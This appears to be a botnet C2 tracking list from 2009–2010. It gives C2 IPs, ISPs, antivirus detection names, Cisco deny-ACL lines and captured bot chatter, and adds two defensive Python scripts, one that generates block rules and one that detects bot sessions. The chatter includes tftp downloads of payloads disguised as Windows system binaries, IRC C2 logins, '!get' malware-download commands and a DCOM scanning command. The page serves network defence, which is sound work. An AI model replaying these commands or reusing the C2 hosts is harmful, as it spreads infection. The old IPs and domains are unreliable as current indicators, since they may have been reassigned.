  • Client: JOIN #las6 USERHOST gEJwHkFaMODE #m +smntuPRIVMSG #m...
  • Client: MODE #las6 +smntu
  • Server: :hub.20582.com 482 gEJwHkFa #las6 :You're not channel operator
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.variant
AntiVir: VanBot.AX.116
Authentium: MISSED
Avast: _SdBot-4142
AVG: Generic_c.VB
BitDefender: Agent.YRG
CAT-QuickHeal: VanBot.ax
ClamAV: PUA.Packed.Expressor
DrWeb: IRC.Sdbot.945
eSafe: VanBot.ax
eTrust-Vet: Linkbot.OC
Ewido: VanBot.ax
FileAdvisor: MISSED
Fortinet: VanBot.AX!tr.bdr
F-Prot: MISSED
F-Secure: VanBot.ax
Ikarus: Agent.YRG
Kaspersky: VanBot.ax
McAfee: MISSED
Microsoft: Exploit_MS06040.gen
NOD32v2: MISSED
Norman: Hupigon.gen83
Panda: RXBot.AB.worm
Prevx1: MISSED
Rising: IRCbot.fbi
Sophos: MISSED
Sunbelt: Agent.YRG
Symantec: IRCbot
TheHacker: BackdoorVanBot.ax
TrendMicro: MISSED
VBA32: VanBot.ax
VirusBuster: RBot.ONM
Webwasher-Gateway: VanBot.AX.116

Priority 8
TCP Ports: 3305
Filter: deny ip host 212.54.2.171 any log ! 8 infects 10/30/09 to 12/28/09
Domain: megabaud.fi
ISP: elisa oyj
Clients: 8 (finland)
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 202.157.56.125 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 202.157.56.125 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|nold11864USER zspnyxd3k * 0 :USA|2K|633
  • Server: :hub.35869.net 001 P|nold11864...
  • Client: USERHOST P|nold11864
  • Server: :hub.35869.net 302 P|nold11864...
  • Client: USERHOST P|nold11864MODE P|nold11864 JOIN #mm RSA
  • Client: PRIVMSG #mm...

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.variant
AntiVir: TRDropper.Gen
Authentium: Threat-HLLIYE!Eldorado
Avast: _DCom-F
AVG: Heur
BitDefender: Packer.Yoda.A
CAT-QuickHeal: IRCBot.idc
ClamAV: MISSED
DrWeb: HLLW.Piabot
eSafe: TRDropper
eTrust-Vet: IRCBot.KU
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: PossibleThreat
F-Prot: Threat-HLLIYE!Eldorado
F-Secure: IRCBot.idc
Ikarus: Exploit.MS06040
Kaspersky: IRCBot.idc
McAfee: MISSED
Microsoft: Exploit_MS06040.gen
NOD32v2: MISSED
Norman: Smalltroj.MTNE
Panda: Gaobot.OXI.worm
Prevx1: MISSED
Rising: MS06-040.b
Sophos: MalPacker
Sunbelt: Wootbot.gen
Symantec: Spybot.Worm
TheHacker: BackdoorIRCBot.idc
TrendMicro: TROJ_LSADCOM.MCL
VBA32: Kolabc.gco
VirusBuster: IRCBot.AAWX
Webwasher-Gateway: MISSED

Priority 8
TCP Ports: 65520 65520 88
Filter: deny ip host 122.195.190.197 any log ! 8 infects 12/30/09 to 01/07/10
Domain: canadian-solar.com
ISP: china unicom jiangsu province network
Clients: 8 (china)
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 70.184.248.143 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 70.184.248.143 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK ynqsvhnjUSER r020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :u. PRIVMSG ynqsvhnj :!get http:/www.liagand.cn/img/unpr.gif:u...
  • Client: GET /img/unpr.gif HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /erdown.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /pk/pw1022.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /p0905/2.0/d.bin?js02679582 HTTP/1.0Accept: */*User-Agent:...
  • Server: GET /portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: GET /portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: GET /p1022/2.0/ms.bin?js0241037 HTTP/1.0Accept: */*User-Agent:...
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority 8
TCP Ports: 65520 91
Filter: deny ip host 91.212.220.156 any log ! 8 infects 08/23/09 to 09/07/09
Domain: -
ISP: group vertical ltd
Clients: 8 (russian federation)
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host:...
  • Client: NICK dtugkmbeUSER i020501 . . :-
  • Client: JOIN &virtu
  • Server: :k. PRIVMSG dtugkmbe :!get http:/gidromash.cn/oc/box.txt
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: NICK jddwnomeUSER n020501 . . :-
  • Client: JOIN &virtu
  • Server: :l. PRIVMSG jddwnome :!get http:/gidromash.cn/oc/box.txt
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.B
AntiVir: Virut.AX
Authentium: Korgo.V
Avast: _Virtob
AVG: Korgo.A
BitDefender: Padobot.BV.Dam
CAT-QuickHeal: Virut.Z
ClamAV: Virut-54
DrWeb: Lsabot
eSafe: MISSED
eTrust-Vet: Virut.7115
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.AV
F-Prot: Korgo.V
F-Secure: MISSED
Ikarus: Padobot.M
Kaspersky: Padobot.m
McAfee: Virut.gen.a
Microsoft: Korgo.V
NOD32v2: MISSED
Norman: Korgo.V
Panda: Virutas.FG
Prevx1: MISSED
Rising: Virut.an
Sophos: Virut-W
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.av
TrendMicro: PE_VIRUT.AV
VBA32: Virut.2
VirusBuster: Padobot.D
Webwasher-Gateway: MISSED

Priority 7
TCP Ports: 65520
Filter: deny ip host 221.5.74.39 any log ! 7 infects 08/13/09 to 08/17/09
Domain: cncnet.net
ISP: china unicom guangdong province network
Clients: 7 (china)
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 222.234.215.213 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 222.234.215.213 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK jdhsdjqxUSER p020501 . . :-
  • Client: JOIN &virtu
  • Server: :j. PRIVMSG jdhsdjqx :!get http:/dretis.cn/oc/box.txt
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.D
AntiVir: Virut.Gen
Authentium: Virut.9264
Avast: _Virut
AVG: Virut
BitDefender: Virtob.3.Gen
CAT-QuickHeal: Virut.D
ClamAV: Virut.ca
DrWeb: Virut.5
eSafe: MISSED
eTrust-Vet: Virut.9276
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MetaCrypt.5
F-Prot: Virut.9264
F-Secure: Virut.n
Ikarus: Virut.d
Kaspersky: Virut.n
McAfee: Virut.gen
Microsoft: Virut.AK
NOD32v2: Virut.E
Norman: Virut.D
Panda: Virutas.gen
Prevx1: MISSED
Rising: Virut.GEN
Sophos: Virut-L
Sunbelt: MISSED
Symantec: MISSED
TheHacker: Virut.gen
TrendMicro: PE_VIRUT.D-2
VBA32: Virut.3
VirusBuster: Virut.Gen
Webwasher-Gateway: Virut.Gen

Priority 7
TCP Ports: 3305
Filter: deny ip host 211.233.45.253 any log ! 7 infects 09/01/09 to 09/08/09
Domain: kidc.net
ISP: korea internet data center inc
Clients: 7 (korea, republic of)
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 96.8.226.33 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 96.8.226.33 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|tyz4nprpcUSER v7sfuv623 * 0 :USA|XP|126
  • Server: :hub.49523.net 001 P|tyz4nprpc...
  • Client: USERHOST P|tyz4nprpc
  • Server: :hub.49523.net 302 P|tyz4nprpc...
  • Client: USERHOST P|tyz4nprpcMODE P|tyz4nprpc JOIN #mm RSA

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRDropper.Gen
AuthentiumThreat-HLLIYE!Eldorado
Avast_DCom-F
AVGHeur
BitDefenderPacker.Yoda.A
CAT-QuickHealMISSED
ClamAVMISSED
DrWebHLLW.Piabot.4
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtThreat-HLLIYE!Eldorado
F-SecureMISSED
IkarusExploit.MS06040
KasperskyHeur.Generic
McAfeeMISSED
MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanMISSED
PandaTrjCI.A
Prevx1MISSED
RisingMISSED
SophosMalPacker
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroPAK_Generic.001
VBA32MISSED
VirusBusterPackedYoda
Webwasher
Gateway
MISSED
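Each entry's Filter field is a Cisco IOS extended-ACL line ("deny ip host <C2> any log"), with the "!" comment carrying the infection count, first/last-seen dates and the C2's domain. The following is an added example, not code from the original page, that parses records in that flattened one-line format, keeps only the C2s last seen within a chosen window (the observation dates on this page run from August 2009 to February 2010, and an IP that old may since have been reassigned to an innocent tenant, so the window and the as-of date matter), and emits both the IOS line and an equivalent iptables LOG+DROP pair. The three record strings are copied from entries on this page; the as-of date, the 30-day window and the use of the FORWARD chain are assumptions.

```python
import re
from datetime import date, datetime, timedelta

# Constructed sample: three records in the page's flattened one-line format.
SAMPLE_RECORDS = """\
Priority 7 TCP Ports 3305 Filter deny ip host 211.233.45.253 any log ! 7 infects 09/01/09 to 09/08/09 kidc.net ISP korea internet data center inc
Priority 7 TCP Ports 65520 Filter deny ip host 83.133.119.206 any log ! 7 infects 02/06/10 to 02/08/10 greatnet.de ISP lncde-greatnet-newmedia
Priority 5 TCP Ports 8080 8080 67 Filter deny ip host 72.10.172.211 any log ! 5 infects 08/17/09 to 10/16/09 gtcomm.net ISP globotech communications
"""

# One record per line: priority, port list, the IOS ACL entry (whose '!' comment carries
# infection count, first/last seen and the C2's domain), then the hosting ISP.
RECORD_RE = re.compile(
    r"^Priority (?P<priority>\d+) TCP Ports (?P<ports>[\d ]+?) "
    r"Filter deny ip host (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) any log ! "
    r"(?P<infects>\d+) infects (?P<first>\d\d/\d\d/\d\d) to (?P<last>\d\d/\d\d/\d\d) "
    r"(?P<domain>\S+) ISP (?P<isp>.*)$"
)


def parse_record(line):
    """Parse one 'Priority ... Filter deny ip host ...' line; None if it is not a record."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["priority"] = int(rec["priority"])
    rec["infects"] = int(rec["infects"])
    # The port column is taken at face value: distinct numbers, first-seen order.
    ports = []
    for p in rec["ports"].split():
        if int(p) not in ports:
            ports.append(int(p))
    rec["ports"] = ports
    rec["first"] = datetime.strptime(rec["first"], "%m/%d/%y").date()
    rec["last"] = datetime.strptime(rec["last"], "%m/%d/%y").date()
    return rec


def parse_records(text):
    return [r for r in (parse_record(line) for line in text.splitlines()) if r]


def select_recent(records, as_of, window_days):
    """Keep only C2s last seen within the window; a stale IP may since have been reassigned."""
    if isinstance(as_of, str):
        as_of = date.fromisoformat(as_of)
    cutoff = as_of - timedelta(days=window_days)
    return [r for r in records if r["last"] >= cutoff]


def ios_acl(rec):
    """The page's own ACL form: block all IP to the C2, log hits, keep the evidence as a comment."""
    return (f"deny ip host {rec['ip']} any log ! {rec['infects']} infects "
            f"{rec['first']:%m/%d/%y} to {rec['last']:%m/%d/%y} {rec['domain']}")


def iptables_rules(rec):
    """Equivalent egress rules for a Linux gateway: LOG then DROP, tagged with the same evidence."""
    comment = f"{rec['domain']} tcp {','.join(map(str, rec['ports']))} last {rec['last']:%Y-%m-%d}"
    base = f"iptables -A FORWARD -d {rec['ip']} -m comment --comment \"{comment}\""
    return [f"{base} -j LOG --log-prefix \"c2-block \"", f"{base} -j DROP"]


if __name__ == "__main__":
    # As-of date and window are assumptions; adjust both to the list you are actually deploying.
    for r in select_recent(parse_records(SAMPLE_RECORDS), "2010-02-09", 30):
        print(ios_acl(r))
        print("\n".join(iptables_rules(r)))
```

The ACL denies all IP to the host, not just the listed ports, so the iptables pair does the same and keeps the port list only as evidence in the rule comment. Run the generator against the full list with the as-of date set to the day you deploy, and re-run it as the list is refreshed so that expired entries drop out rather than accumulating.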

Priority: 7
TCP Ports: 65520
Filter: deny ip host 83.133.119.206 any log ! 7 infects 02/06/10 to 02/08/10 greatnet.de
ISP: lncde-greatnet-newmedia
Clients: 7
Country: germany
Activity Domain: greatnet.de
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 116.126.215.24 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 116.126.215.24 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK lcntiouuUSER c020501 . . :_
  • Client: JOIN &virtu
  • Server: :u. PRIVMSG lcntiouu :!get...
  • Client: GET /build/setup10.exe HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
  • Server: GET /bt4/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: Siggen.49592
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: Cryptor
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: Suspicious.Insight
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority: 6
TCP Ports: 3305
Filter: deny ip host 61.120.62.28 any log ! 6 infects 08/13/09 to 08/22/09 dion.ne.jp
ISP: rabby_s inc
Clients: 6
Country: japan
Activity Domain: dion.ne.jp
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 173.22.150.5 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 173.22.150.5 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|zr9eaoxa1USER dejgzufxb * 0 :USA|XP|577
  • Server: :hub.10842.net 001 P|zr9eaoxa1...
  • Client: USERHOST P|zr9eaoxa1
  • Server: :hub.10842.net 302 P|zr9eaoxa1...
  • Client: USERHOST P|zr9eaoxa1MODE P|zr9eaoxa1 JOIN #mm RSA

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.Gen
AntiVir: TRATRAPS.Gen
Authentium: MISSED
Avast: _DCom-F
AVG: SHeur2.AOLW
BitDefender: Generic.Mydoom.F72197F1
CAT-QuickHeal: Agent.gen
ClamAV: MISSED
DrWeb: HLLW.Piabot.origin
eSafe: MISSED
eTrust-Vet: IRCBot.PJ
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Kolabc.gza
Ikarus: Exploit.MS06040
Kaspersky: Kolabc.gza
McAfee: Spybot.worm!l
Microsoft: Exploit_MS06040.gen
NOD32v2: MISSED
Norman: Atraps.MQB
Panda: TrjCI.A
Prevx1: MISSED
Rising: MISSED
Sophos: MalBehav-004
Sunbelt: MISSED
Symantec: Spybot.Worm
TheHacker: MISSED
TrendMicro: SPYBOT.BIM
VBA32: MISSED
VirusBuster: RBot.Gen.3
Webwasher-Gateway: MISSED
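The kidc.net and dion.ne.jp entries, and several later ones, share one chatter sequence: a dir of dllcache\tftpd.exe to see whether a TFTP client is available, tftp -i fetches of files named svchost.exe and dllhost.exe, then an IRC registration with a machine-generated NICK, a USER realname advertising country and OS (USA|XP|577), and a JOIN to a keyed channel (#mm RSA). The following is an added example, not code from the original page, of detection logic that runs over such captured client-side command lines: it labels each line with a stage (recon, dropper, c2-login, c2-join) and treats a session that combines a C2 login with a dropper or a keyed join as a bot. The sample lines are constructed from the patterns above, with three ordinary IRC lines added for contrast; the nick and realname regexes and the list of camouflage file names are assumptions drawn from this page, not a vendor signature set.

```python
import re

# Constructed sample of captured client-side lines, modelled on the chatter in the entries above;
# the last three lines are an ordinary IRC user for contrast.
SAMPLE_CHATTER = [
    "dir dllcache\\tftpd.exe",
    "tftp -i 173.22.150.5 get svchost.exe wins\\SVCHOST.EXE",
    "tftp -i 173.22.150.5 get dllhost.exe wins\\DLLHOST.EXE",
    "PASS secretpass",
    "NICK P|zr9eaoxa1",
    "USER dejgzufxb * 0 :USA|XP|577",
    "USERHOST P|zr9eaoxa1",
    "JOIN #mm RSA",
    "NICK [USA]XP-SP0[00]1198",
    "NICK alice",
    "USER alice 0 * :Alice Example",
    "JOIN #python",
]

TFTP_GET = re.compile(r"^tftp\s+(?:-i\s+)?(?P<host>\S+)\s+get\s+(?P<remote>\S+)(?:\s+(?P<local>\S+))?", re.I)
DIR_TFTPD = re.compile(r"^dir\s+dllcache\\tftpd\.exe$", re.I)
IRC_CMD = re.compile(r"^(?P<cmd>NICK|USER|JOIN)\s+(?P<args>.*)$", re.I)
# Nick shapes seen above (assumed templates): a 1-3 letter prefix, '|', random alphanumerics;
# or [CC]OS-tag[nn]digits as in [USA]XP-SP0[00]1198.
BOT_NICK = re.compile(r"^(?:[A-Za-z]{1,3}\|[A-Za-z0-9]{6,}|\[[A-Z]{2,3}\][A-Za-z0-9-]+\[\d+\]\d+)$")
# Realname of the form COUNTRY|OS|number, as in ':USA|XP|577'.
BOT_REALNAME = re.compile(r"^:?[A-Z]{2,3}\|[A-Z0-9]{2,3}\|\d+$")
# Names the droppers above reuse so the payload blends in with Windows binaries (assumed list).
SYSTEM_FILES = {"svchost.exe", "dllhost.exe", "lsass.exe", "winlogon.exe"}


def classify_line(line):
    """Return (stage, reason) for a suspicious line, or None for a benign-looking one."""
    line = line.strip()
    if DIR_TFTPD.match(line):
        return ("recon", "checks for the tftp client in dllcache before using it")
    m = TFTP_GET.match(line)
    if m:
        remote = m.group("remote").lower()
        local = (m.group("local") or "").lower().rsplit("\\", 1)[-1]
        if remote.endswith((".exe", ".dll")):
            why = f"tftp download of executable from {m.group('host')}"
            if remote in SYSTEM_FILES or local in SYSTEM_FILES:
                why += " masquerading as a Windows system binary"
            return ("dropper", why)
    m = IRC_CMD.match(line)
    if m:
        cmd, args = m.group("cmd").upper(), m.group("args").strip()
        if cmd == "NICK" and BOT_NICK.match(args):
            return ("c2-login", "machine-generated bot nick")
        if cmd == "USER":
            # USER <user> <mode> <unused> :<realname>; the realname is where bots advertise OS/country.
            parts = args.split(" ", 3)
            if len(parts) == 4 and BOT_REALNAME.match(parts[3]):
                return ("c2-login", "realname advertises country/OS")
        if cmd == "JOIN":
            parts = args.split()
            if len(parts) >= 2 and not parts[1].startswith(("#", "&")):
                return ("c2-join", f"keyed channel join {parts[0]} key={parts[1]}")
    return None


def score_session(lines):
    """Group hits by stage; recon/dropper plus a C2 login in one session is a strong bot indicator."""
    stages = {}
    for line in lines:
        hit = classify_line(line)
        if hit:
            stages.setdefault(hit[0], []).append((line, hit[1]))
    return stages


def is_bot_session(lines):
    stages = score_session(lines)
    return "c2-login" in stages and ("dropper" in stages or "c2-join" in stages)


if __name__ == "__main__":
    for stage, hits in score_session(SAMPLE_CHATTER).items():
        for line, reason in hits:
            print(f"{stage:9} {reason:60} <- {line}")
    print("bot session:", is_bot_session(SAMPLE_CHATTER))
```

No single line is conclusive on its own: a keyed JOIN or an odd nick also occurs on legitimate IRC networks, and plenty of the nicks on this page (RODhbJxT, Bisho911) match no template at all. The session-level rule is what carries the decision, which is why the tftp fetch and the IRC login are scored together rather than alerted separately.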

Priority: 6
TCP Ports: 80
Filter: deny ip host 82.98.86.170 any log ! 6 infects 08/22/09 to 11/08/09 fhe3rz.net
ISP: sedo domain parking
Clients: 6
Country: germany
Activity Domain: fhe3rz.net
Chatter Example
  • Client: GET /xxxxxxx HTTP/1.0User-Agent: bHost: 203.180.17.238
  • Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: GET...
  • Server: GET /css/724/landing/en.css HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/body_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/td_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/container_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/keywords_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/bullet.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/pop_cat_top.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/searchtext_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/search.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/footer_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...

BotClient Antivirus Diagnoses
AhnLab-V3: Korgo.46592
AntiVir: Padobot.Z.2
Authentium: Berbew.M
Avast: _Padobot-I
AVG: Generic7.ORM
BitDefender: Generic.208542
CAT-QuickHeal: I-Padobot.z
ClamAV: Korgo.Z
DrWeb: HangUp.26
eSafe: MISSED
eTrust-Vet: Berkor.A
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: Berbew.M
F-Secure: Padobot.z
Ikarus: Padobot.Z
Kaspersky: Padobot.z
McAfee: MISSED
Microsoft: Berbew.BE!dam
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: Berbew.d
Sophos: Doxpar-C
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: BKDR_BERBEW.Q
VBA32: Padobot.z
VirusBuster: Padobot.B
Webwasher-Gateway: MISSED

Priority: 5
TCP Ports: 8080 72
Filter: deny ip host 67.43.236.66 any log ! 5 infects 08/13/09 to 10/02/09 -
ISP: nader dara
Clients: 5
Country: lebanon
Activity Domain: -
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 24.103.196.250 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 24.103.196.250 get dllhost.exe wins\DLLHOST.EXE
  • Client: USER iqelkq iqelkq iqelkq :rjrximinlwihoahg
  • Client: NICK RODhbJxT
  • Client: MODE RODhbJxT +xi
  • Client: JOIN #las6 USERHOST RODhbJxTMODE #m +smntuPRIVMSG #m...
  • Client: GET /rs3.exe HTTP/1.0Host: nadsamcabran12.com
  • Client: MODE #las6 +smntu
  • Server: :hub.20582.com 482 RODhbJxT #las6 :You're not channel operator
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: :eh!Y@hoo.net PRIVMSG #las6 :* ipscan s.s.s.s dcom2 -sERROR...

BotClient Antivirus Diagnoses
AhnLab-V3: Virut
AntiVir: Virut.AT
Authentium: Virut.AG
Avast: _Virtob
AVG: RBot.KB
BitDefender: IRC-Generic.3619
CAT-QuickHeal: Virut.Y
ClamAV: Small-4287
DrWeb: IRC.Sdbot.2665
eSafe: TRCrypt.nspm
eTrust-Vet: Virut.6640
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Nepoe.EM!tr.bdr
F-Prot: Virut.AG
F-Secure: Nepoe.em
Ikarus: MISSED
Kaspersky: Nepoe.em
McAfee: Virut.gen.a
Microsoft: Virut.AA
NOD32v2: MISSED
Norman: Virut.AH
Panda: Virutas.AH
Prevx1: MISSED
Rising: Virut.al
Sophos: Virut-Gen
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.genS
TrendMicro: PE_VIRUT.AT
VBA32: Nepoe.em
VirusBuster: PoeBot.OB
Webwasher-Gateway: MISSED

Priority: 5
TCP Ports: 8080 8080 67
Filter: deny ip host 72.10.172.211 any log ! 5 infects 08/17/09 to 10/16/09 gtcomm.net
ISP: globotech communications
Clients: 5
Country: canada
Activity Domain: gtcomm.net
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 24.103.196.250 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 24.103.196.250 get dllhost.exe wins\DLLHOST.EXE
  • Client: USER jseabq jseabq jseabq :dqhawgsvzjhxsrsm
  • Client: NICK ErEDHMyl
  • Client: MODE ErEDHMyl +xi
  • Client: GET /rs3.exe HTTP/1.0Host: idfc.info
  • Server: GET /f.exe HTTP/1.0Host: idfc.info
  • Client: JOIN #las6 USERHOST ErEDHMylMODE #m +smntuPRIVMSG #m...
  • Client: MODE #las6 +smntu
  • Server: :hub.20582.com 482 ErEDHMyl #las6 :You're not channel operator

BotClient Antivirus Diagnoses
AhnLab-V3: Virut
AntiVir: Virut.AT
Authentium: Virut.AG
Avast: _Virtob
AVG: RBot.KB
BitDefender: IRC-Generic.3619
CAT-QuickHeal: Virut.Y
ClamAV: Small-4287
DrWeb: IRC.Sdbot.2665
eSafe: TRCrypt.nspm
eTrust-Vet: Virut.6640
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Nepoe.EM!tr.bdr
F-Prot: Virut.AG
F-Secure: Nepoe.em
Ikarus: MISSED
Kaspersky: Nepoe.em
McAfee: Virut.gen.a
Microsoft: Virut.AA
NOD32v2: MISSED
Norman: Virut.AH
Panda: Virutas.AH
Prevx1: MISSED
Rising: Virut.al
Sophos: Virut-Gen
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.genS
TrendMicro: PE_VIRUT.AT
VBA32: Nepoe.em
VirusBuster: PoeBot.OB
Webwasher-Gateway: MISSED

Priority: 5
TCP Ports: 65520 65520 216
Filter: deny ip host 218.93.205.24 any log ! 5 infects 08/13/09 to 08/14/09 163data.com.cn
ISP: chinanet jiangsu province network
Clients: 5
Country: china
Activity Domain: 163data.com.cn
Chatter Example
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Client: POST...
  • Server: NICK ibeffknfUSER v020500 . . :_
  • Client: Service Pack 2JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority: 4
TCP Ports: 65520 65520 216
Filter: deny ip host 218.93.205.23 any log ! 4 infects 08/19/09 to 08/20/09 163data.com.cn
ISP: chinanet jiangsu province network
Clients: 4
Country: china
Activity Domain: 163data.com.cn
Chatter Example
